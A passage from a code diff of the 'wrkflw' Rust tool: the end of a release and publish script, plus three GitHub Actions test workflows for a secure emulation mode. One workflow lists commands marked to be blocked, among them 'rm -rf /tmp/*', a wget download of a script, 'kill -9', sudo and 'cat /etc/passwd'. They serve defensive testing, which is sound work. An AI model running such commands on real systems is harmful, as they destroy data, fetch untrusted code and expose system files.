||||
echo " $0 publish"
|
||||
else
|
||||
cargo workspaces publish
|
||||
echo "🎉 All crates published successfully!"
|
||||
echo ""
|
||||
echo "Users can now install wrkflw with:"
|
||||
echo " cargo install wrkflw"
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to show changelog info
|
||||
show_changelog_info() {
|
||||
echo "📝 Changelog will be generated automatically by GitHub Actions workflow"
|
||||
}
|
||||
|
||||
# Execute commands based on the operation
|
||||
case "$COMMAND" in
|
||||
"version")
|
||||
update_versions "$VERSION_TYPE"
|
||||
show_changelog_info
|
||||
;;
|
||||
"publish")
|
||||
test_build
|
||||
publish_crates
|
||||
;;
|
||||
"release")
|
||||
echo "🚀 Starting release process..."
|
||||
echo ""
|
||||
|
||||
# Step 1: Update versions
|
||||
update_versions "$VERSION_TYPE"
|
||||
|
||||
# Step 2: Test build
|
||||
test_build
|
||||
|
||||
# Step 3: Show changelog info
|
||||
show_changelog_info
|
||||
|
||||
# Step 4: Publish (if not dry-run)
|
||||
if [[ "$DRY_RUN" != "--dry-run" ]]; then
|
||||
echo ""
|
||||
read -p "🤔 Continue with publishing? (y/N): " -n 1 -r
|
||||
echo
|
||||
if [[ $REPLY =~ ^[Yy]$ ]]; then
|
||||
publish_crates
|
||||
else
|
||||
echo "⏸️ Publishing cancelled. To publish later, run:"
|
||||
echo " $0 publish"
|
||||
fi
|
||||
else
|
||||
echo ""
|
||||
publish_crates
|
||||
fi
|
||||
;;
|
||||
esac
|
||||
|
||||
35
tests/safe_workflow.yml
Normal file
35
tests/safe_workflow.yml
Normal file
@@ -0,0 +1,35 @@
|
||||
name: Safe Workflow Test
|
||||
|
||||
on:
|
||||
push:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
safe_operations:
|
||||
name: Safe Operations
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: List files
|
||||
run: ls -la
|
||||
|
||||
- name: Show current directory
|
||||
run: pwd
|
||||
|
||||
- name: Echo message
|
||||
run: echo "Hello, this is a safe command!"
|
||||
|
||||
- name: Create and read file
|
||||
run: |
|
||||
echo "test content" > safe-file.txt
|
||||
cat safe-file.txt
|
||||
rm safe-file.txt
|
||||
|
||||
- name: Show environment (safe)
|
||||
run: echo "GITHUB_WORKSPACE=$GITHUB_WORKSPACE"
|
||||
|
||||
- name: Check if Rust is available
|
||||
run: which rustc && rustc --version || echo "Rust not found"
|
||||
continue-on-error: true
|
||||
29
tests/security_comparison.yml
Normal file
29
tests/security_comparison.yml
Normal file
@@ -0,0 +1,29 @@
|
||||
name: Security Comparison Demo
|
||||
|
||||
on:
|
||||
push:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
safe_operations:
|
||||
name: Safe Operations (Works in Both Modes)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: List files
|
||||
run: ls -la
|
||||
|
||||
- name: Create and test file
|
||||
run: |
|
||||
echo "Hello World" > test.txt
|
||||
cat test.txt
|
||||
rm test.txt
|
||||
echo "File operations completed safely"
|
||||
|
||||
- name: Environment check
|
||||
run: |
|
||||
echo "Current directory: $(pwd)"
|
||||
echo "User: $(whoami)"
|
||||
echo "Available commands: ls, echo, cat work fine"
|
||||
92
tests/security_demo.yml
Normal file
92
tests/security_demo.yml
Normal file
@@ -0,0 +1,92 @@
|
||||
name: Security Demo Workflow
|
||||
|
||||
on:
|
||||
push:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
safe_commands:
|
||||
name: Safe Commands (Will Pass)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: List project files
|
||||
run: ls -la
|
||||
|
||||
- name: Show current directory
|
||||
run: pwd
|
||||
|
||||
- name: Echo a message
|
||||
run: echo "This command is safe and will execute successfully"
|
||||
|
||||
- name: Check Rust version (if available)
|
||||
run: rustc --version || echo "Rust not installed"
|
||||
|
||||
- name: Build documentation
|
||||
run: echo "Building docs..." && mkdir -p target/doc
|
||||
|
||||
- name: Show environment
|
||||
run: env | grep GITHUB
|
||||
|
||||
dangerous_commands:
|
||||
name: Dangerous Commands (Will Be Blocked)
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
# These commands will be blocked in secure emulation mode
|
||||
- name: Dangerous file deletion
|
||||
run: rm -rf /tmp/* # This will be BLOCKED
|
||||
continue-on-error: true
|
||||
|
||||
- name: System modification attempt
|
||||
run: sudo apt-get update # This will be BLOCKED
|
||||
continue-on-error: true
|
||||
|
||||
- name: Network download attempt
|
||||
run: wget https://example.com/script.sh # This will be BLOCKED
|
||||
continue-on-error: true
|
||||
|
||||
- name: Process manipulation
|
||||
run: kill -9 $$ # This will be BLOCKED
|
||||
continue-on-error: true
|
||||
|
||||
resource_intensive:
|
||||
name: Resource Limits Test
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: CPU intensive task
|
||||
run: |
|
||||
echo "Testing resource limits..."
|
||||
# This might hit CPU or time limits
|
||||
for i in {1..1000}; do
|
||||
echo "Iteration $i"
|
||||
sleep 0.1
|
||||
done
|
||||
continue-on-error: true
|
||||
|
||||
filesystem_test:
|
||||
name: Filesystem Access Test
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Create files in allowed location
|
||||
run: |
|
||||
mkdir -p ./test-output
|
||||
echo "test content" > ./test-output/safe-file.txt
|
||||
cat ./test-output/safe-file.txt
|
||||
|
||||
- name: Attempt to access system files
|
||||
run: cat /etc/passwd # This may be blocked
|
||||
continue-on-error: true
|
||||
|
||||
- name: Show allowed file operations
|
||||
run: |
|
||||
echo "Safe file operations:"
|
||||
touch ./temp-file.txt
|
||||
echo "content" > ./temp-file.txt
|
||||
cat ./temp-file.txt
|
||||
rm ./temp-file.txt
|
||||
echo "File operations completed safely"
|
||||
Reference in New Issue
Block a user